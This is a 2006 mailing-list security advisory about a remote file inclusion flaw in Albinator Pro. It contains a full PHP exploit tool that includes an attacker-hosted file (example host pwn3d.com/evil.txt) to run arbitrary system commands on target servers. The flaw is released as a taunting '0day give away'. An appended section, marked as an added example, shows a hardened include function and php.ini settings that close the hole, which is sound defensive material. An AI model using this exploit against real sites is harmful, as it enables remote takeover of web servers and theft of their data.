Message-ID: <4459B7DD.6070301@gmail.com>
Date: Thu May  4 09:14:33 2006
From: wr0ck.lists at gmail.com (wr0ck)
Subject: [XPA] - Albinator Pro <= 2.0.8 - Remote Command
	Execution Vulnerability

===========================================================================
XOR Crew :: Security Advisory 0day GIVE AWAY         (date?)   2/20/2006
===========================================================================
Albinator Pro <= 2.0.8 - Remote Command Execution Vulnerability
===========================================================================
http://www.xorcrew.net/                     http://www.xorcrew.net/ReZEN
===========================================================================

:: Summary

       Vendor       :  Albinator
       Vendor Site  :  http://www.dreamcost.com/
       Product(s)   :  Albinator Pro - Photo Album/Gallery Management System
       Version(s)   :  All
       Severity     :  Medium/High
       Impact       :  Remote Command Execution
       Release Date :  2/11/2006
       Credits      :  ReZEN (rezen (a) xorcrew (.) net)

===========================================================================

I. Description

Albinator is developed in PHP and backed by a MySQL database. It 
instantly and automatically organizes your website users' digital images 
into compact digital photo albums ideal for sharing and emailing to 
friends and family. It automatically generates thumbnails of the photos 
for easy browsing.


===========================================================================

II. Synopsis (0day give away because r0t is stupid)

THIS BUG WORKS FOR ALL VERSIONS OF ALBINATOR!!!

(r0t you are a moron, stick to useless XSS exploits please thanks)

There is a remote file inclusion vulnerability that allows for remote 
command execution in the /essentials/gc.php and in the 
essentials/integration.inc.php file.  The bug is here on lines 2 and 3:

include_once($dirpath . "essential/config.php");
include_once($dirpath . "essential/config_tables.inc.php");

The $dirpath variable is not set prior to being used in the 
include_once() function. The vendor and support team have been contacted.

===========================================================================

Exploit code:

-----BEGIN-----

<?php
/*
Albinator Remote File Inclusion Exploit c0ded by ReZEN
Sh0uts: xorcrew.net, ajax, gml, #subterrain, D2K
url:  http://www.xorcrew.net/ReZEN

example:
turl: http://www.target.com/path to albinator/essential/gc.php?dirpath=
hurl: http://www.pwn3d.com/evil.txt?

*/

$cmd = $_POST["cmd"];
$turl = $_POST["turl"];
$hurl = $_POST["hurl"];

$form= "<form method=\"post\" action=\"".$PHP_SELF."\">"
     ."turl:<br><input type=\"text\" name=\"turl\" size=\"90\" 
value=\"".$turl."\"><br>"
     ."hurl:<br><input type=\"text\" name=\"hurl\" size=\"90\" 
value=\"".$hurl."\"><br>"
     ."cmd:<br><input type=\"text\" name=\"cmd\" size=\"90\" 
value=\"".$cmd."\"><br>"
     ."<input type=\"submit\" value=\"Submit\" name=\"submit\">"
     ."</form><HR WIDTH=\"650\" ALIGN=\"LEFT\">";

if (!isset($_POST['submit']))
{

echo $form;

}else{

$file = fopen ("test.txt", "w+");

fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\");
system(\"echo ++END++\"); ?>");
fclose($file);

$file = fopen ($turl.$hurl, "r");
if (!$file) {
     echo "<p>Unable to get output.\n";
     exit;
}

echo $form;

while (!feof ($file)) {
     $line .= fgets ($file, 1024)."<br>";
     }
$tpos1 = strpos($line, "++BEGIN++");
$tpos2 = strpos($line, "++END++");
$tpos1 = $tpos1+strlen("++BEGIN++");
$tpos2 = $tpos2-$tpos1;
$output = substr($line, $tpos1, $tpos2);
echo $output;

}
?>


------END------

===========================================================================

IV. Greets :>

All of xor, Infinity, stokhli, ajax, gml, cijfer, D2K.

===========================================================================
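
A hardened form of the two include_once() lines quoted in section II, as an added example that is not part of the original advisory and is not Albinator's code. It assumes the flaw is reachable because a request parameter can populate the unset $dirpath (register_globals or equivalent request-variable extraction); safe_include_path() and the demo paths are hypothetical and constructed.

```php
<?php
// Added example; safe_include_path() is a hypothetical helper, not Albinator code.

function safe_include_path(string $baseDir, string $relative): string
{
    // realpath() only understands the local filesystem: a base such as
    // "http://host/file?" resolves to false, and "../" segments are collapsed.
    $root = realpath($baseDir);
    if ($root === false || !is_dir($root)) {
        throw new InvalidArgumentException("base is not a local directory: $baseDir");
    }
    $full = realpath($root . DIRECTORY_SEPARATOR . $relative);
    if ($full === false || !is_file($full)) {
        throw new InvalidArgumentException("no such local file: $relative");
    }
    // The resolved file must still sit under the resolved base.
    if (strncmp($full, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        throw new InvalidArgumentException("path escapes base: $relative");
    }
    return $full;
}

// In the application the base comes from the file's own location, never from
// a variable a request can populate (assumes the script sits in essential/):
//   $dirpath = dirname(__DIR__) . '/';
//   include_once safe_include_path($dirpath, 'essential/config.php');

// Constructed demo tree so the script runs on its own.
$tmp = sys_get_temp_dir() . '/rfi_demo_' . getmypid();
mkdir("$tmp/app/essential", 0700, true);
file_put_contents("$tmp/app/essential/config.php", "<?php // constructed stub\n");
file_put_contents("$tmp/outside.php", "<?php // constructed stub\n");

$cases = [  // [base, relative], all constructed
    ["$tmp/app", 'essential/config.php'],                          // legitimate
    ['http://example.invalid/evil.txt?', 'essential/config.php'],  // request-supplied base
    ["$tmp/app", '../outside.php'],                                // traversal out of base
];
foreach ($cases as [$base, $rel]) {
    try {
        echo 'ALLOW  ', safe_include_path($base, $rel), "\n";
    } catch (InvalidArgumentException $e) {
        echo 'REJECT ', $e->getMessage(), "\n";
    }
}
```

Setting allow_url_include (and, on older PHP, allow_url_fopen) to Off and register_globals to Off in php.ini closes the same path at the configuration level, independent of the code change.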
